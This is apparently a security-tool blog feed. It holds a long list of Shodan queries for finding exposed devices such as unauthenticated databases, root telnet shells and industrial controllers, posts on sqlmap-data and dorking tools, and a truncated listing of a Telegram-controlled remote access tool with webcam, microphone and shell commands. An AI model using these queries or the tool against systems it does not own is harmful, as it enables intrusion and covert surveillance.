tag:blogger.com,1999:blog-83172222311336605472024-03-19T02:21:46.575-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger5852125tag:blogger.com,1999:blog-8317222231133660547.post-81316120703268537362024-03-18T08:30:00.000-03:002024-03-18T08:30:00.134-03:00Shodan Dorks<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/s2174/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1238" data-original-width="2174" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/w640-h364/shodan.png" width="640" /></a></div><p><br /></p><h3>Shodan Dorks by twitter.com/lothos612</h3> <p>Feel free to make suggestions</p><span><a name='more'></a></span><p><br /></p> <h1>Shodan Dorks</h1> <h1>Basic Shodan Filters</h1> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country. <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by giving geographical coordinates. <code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. 
<code>server: "gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices based on an IP address or a CIDR range. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices seen before or after a given date, or between two dates. <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self-signed certificates <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer 
Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to internet:</h3> <p>No auth required to access CLI terminal. 
<code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p>"voter system serial" country:US</p> <h3>Open ATM:</h3> <p>May allow for ATM Access availability <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access 
Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla Powerpack charging Status:</h3> <p>Helps to find the charging status of tesla powerpack. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> 
<code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. 
<code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy fractured update approach. 🙄 More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find the cleartext wifi passwords in Shodan. 
<code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured WordPress Sites:</h3> <p>If wp-config.php is accessible, it can expose the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results; narrow it down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with <a href="https://www.kitploit.com/search/label/Anonymous" target="_blank" title="Anonymous">Anonymous</a> Login</h3> <p><code>"220" "230 Login successful." 
port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers & Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, 
etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Ethereum Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="Directory">Directory</a> Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lothos612/shodan" rel="nofollow" target="_blank" title="Download Shodan">Download Shodan</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-28563560138004185342024-03-17T08:30:00.005-03:002024-03-17T08:30:00.135-03:00mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu"><img alt="" 
border="0" height="640" id="BLOGGER_PHOTO_ID_7345629037921874834" src="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu=w640-h640" width="640" /></a></p> <p><strong><br /></strong></p><p><strong>mapXplore</strong> is a modular application that imports the data extracted by <a href="https://www.kitploit.com/search/label/SQLMap" target="_blank" title="sqlmap">sqlmap</a> into a <a href="https://www.kitploit.com/search/label/PostgreSQL" target="_blank" title="PostgreSQL">PostgreSQL</a> or <a href="https://www.kitploit.com/search/label/SQLite" target="_blank" title="SQLite">SQLite</a> database.</p> <p>Its main features are:</p> <ul> <li>Import of information extracted by sqlmap into PostgreSQL or SQLite for subsequent querying.</li> <li>Sanitized information: at import time it decodes or transforms unreadable information into readable form.</li> <li>Search for information across all tables, such as passwords, users, and any other data of interest.</li> <li> <p>Automatic export of information stored in <strong>base64</strong>, such as:</p> <ul> <li>Word, Excel, PowerPoint files</li> <li>.zip files</li> <li>Text files or plain text information</li> <li>Images</li> </ul> </li> <li> <p>Filter tables and columns by criteria.</p> </li> <li>Filter by different types of hash functions without requiring prior conversion.</li> <li>Export relevant information to Excel or HTML</li></ul><span><a name='more'></a></span><div><br /></div> <h1>Installation</h1> <h2>Requirements</h2> <ul> <li>python-3.11</li> </ul> <pre><code>git clone https://github.com/daniel2005d/mapXplore<br />cd mapXplore<br />pip install -r requirements<br /></code></pre> <h1>Usage</h1> <p>It is a modular application consisting of the following:</p> <ul> <li><strong>config</strong>: It is responsible for 
the configuration, such as the database <a href="https://www.kitploit.com/search/label/Engine" target="_blank" title="engine">engine</a> to use, import paths, and other settings.</li> <li><strong>import</strong>: It is responsible for importing and processing the information extracted by <strong>sqlmap</strong>.</li> <li><strong>query</strong>: It is the main module, capable of filtering and extracting the required information.<ul> <li>Filter by tables</li> <li>Filter by columns</li> <li>Filter by one or more words</li> <li>Filter by one or more hash functions, including:<ul> <li>MD5</li> <li>SHA1</li> <li>SHA256</li> <li>SHA3</li> <li>....</li> </ul> </li> </ul> </li> </ul> <h3>Startup</h3> <blockquote> <p>Allows loading a default configuration at the start of the program</p> </blockquote> <pre><code>python engine.py [--config config.json]<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7345629069448547762" src="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s=w640-h292" width="640" /></a></p> <h2>Modules</h2> <ul> <li><a href="https://github.com/daniel2005d/doc/en/configuration.md" rel="nofollow" target="_blank" title="config">config</a></li> <li><a href="https://github.com/daniel2005d/doc/en/import.md" rel="nofollow" target="_blank" title="import">import</a></li> <li><a href="https://github.com/daniel2005d/doc/en/main.md" rel="nofollow" target="_blank" title="principal|search">principal|search</a></li> </ul><br /><br /><div style="text-align: center;"><b><span 
style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/daniel2005d/mapXplore" rel="nofollow" target="_blank" title="Download mapXplore">Download mapXplore</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-30578830815800991132024-03-16T08:30:00.007-03:002024-03-16T08:30:00.240-03:00Dorkish - Chrome Extension Tool For OSINT & Recon<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345707297268900690" src="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U=w542-h640" width="542" /></a></p><br /> <p>During the <a href="https://www.kitploit.com/search/label/Reconaissance" target="_blank" title="reconnaissance">reconnaissance</a> phase or when doing OSINT, we often use Google dorking and Shodan, and that is the idea behind Dorkish. 
<br /> Dorkish is a Chrome extension that facilitates custom dork creation for Google and Shodan using its builder, and it offers prebuilt dorks for efficient <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> and OSINT engagements.</p><span><a name='more'></a></span><p><br /></p> <h1>Installation And Setup</h1> <p>1- Clone the repository </p> <pre><code>git clone https://github.com/yousseflahouifi/dorkish.git<br /></code></pre> <p>2- Go to chrome://extensions/ and enable Developer mode in the top right corner.<br /> 3- Click the Load unpacked extension button and select the dorkish folder.</p> <p><strong>Note:</strong> For Firefox users, the extension is available here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/</p> <h1>Features</h1> <h2>Google dorking</h2> <ul> <li>Builder with keywords to filter your Google search results.</li> <li>Prebuilt dorks for bug bounty programs.</li> <li>Prebuilt dorks used during the reconnaissance phase in bug bounty.</li> <li>Prebuilt dorks for exposed files and directories</li> <li>Prebuilt dorks for login and sign-up portals</li> <li>Prebuilt dorks for cyber security jobs</li> </ul> <h2>Shodan dorking</h2> <ul> <li>Builder with the filter keywords used in Shodan.</li> <li>Variety of prebuilt dorks to find IoT devices, network <a href="https://www.kitploit.com/search/label/Infrastructure" target="_blank" title="infrastructure">infrastructure</a>, <a href="https://www.kitploit.com/search/label/Cameras" target="_blank" title="cameras">cameras</a>, ICS, databases, etc.</li> </ul> <h1>Usage</h1> <p>Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. 
Then, you can explore and enjoy the results that match your query.</p> <h1>TODO</h1> <ul> <li>Add more useful dorks and categories</li> <li>Fix some bugs</li> <li>Add a search bar to search through the results</li> <li>Might add some LLM models to build dorks</li></ul> <h1>Notes</h1> <p>I have built some dorks and I have used some public resources to gather the dorks; here are a few:</p> <ul> <li>https://github.com/lothos612/shodan</li> <li>https://github.com/TakSec/google-dorks-bug-bounty</li> </ul> <h1>Warning</h1> <ul> <li>I am not responsible for any damage caused by using the tool</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/yousseflahouifi/dorkish" rel="nofollow" target="_blank" title="Download Dorkish">Download Dorkish</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-24110378230006001572024-03-15T08:30:00.019-03:002024-03-15T08:30:00.251-03:00Pyradm - Python Remote Administration Tool Via Telegram<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8" style="text-align: left;"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a></p><p><br /></p> <blockquote> <p>Remote administration cross-platform tool via Telegram<br /> Coded with ❤️ <strong>python3</strong> + <strong>aiogram3</strong><br /> https://t.me/pt_soft</p> </blockquote> <h2>v0.3</h2> <ul> <li>[X] <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" 
title="Screenshot">Screenshot</a> from target</li> <li>[X] Cross-platform</li> <li>[X] Upload/Download</li> <li>[X] Fully compatible shell</li> <li>[X] Process list</li> <li>[X] <a href="https://www.kitploit.com/search/label/Webcam" target="_blank" title="Webcam">Webcam</a> (video record or screenshot)</li> <li>[X] Geolocation</li> <li>[X] File manager</li> <li>[X] Microphone</li> <li>[X] Clipboard (text, image)</li> </ul><span><a name='more'></a></span><div><br /></div> <h2>Functionality</h2> <pre><code>/start - start pyradm<br />/help - help<br />/shell - shell commands<br />/sc - screenshot<br />/download - download (abs. path)<br />/info - system info<br />/ip - public ip address and geolocation<br />/ps - process list<br />/webcam 5 - record video (secs)<br />/webcam - screenshot from camera<br />/fm - filemanager<br />/fm /home or /fm C:\<br />/mic 10 - <a href="https://www.kitploit.com/search/label/Record%20Audio" target="_blank" title="record audio">record audio</a> from mic<br />/clip - get clipboard data<br />Press button to download file<br />Send any file as file for upload to target<br /></code></pre> <h2>Install</h2> <ul> <li><code>git clone https://github.com/akhomlyuk/pyradm.git</code></li> <li><code>cd pyradm</code></li> <li><code>pip3 install -r requirements.txt</code></li> <li><code>Put the bot <a href="https://www.kitploit.com/search/label/Token" target="_blank" title="token">token</a> in cfg.py (ask @BotFather)</code></li> <li><code>python3 main.py</code></li> </ul> <h2>Compile</h2> <ul> <li><code>Put the bot token in cfg.py</code></li> <li><code>pip install nuitka</code></li> <li><code>nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py</code></li> </ul> <h2>Screens</h2> <p style="text-align: center;"><a 
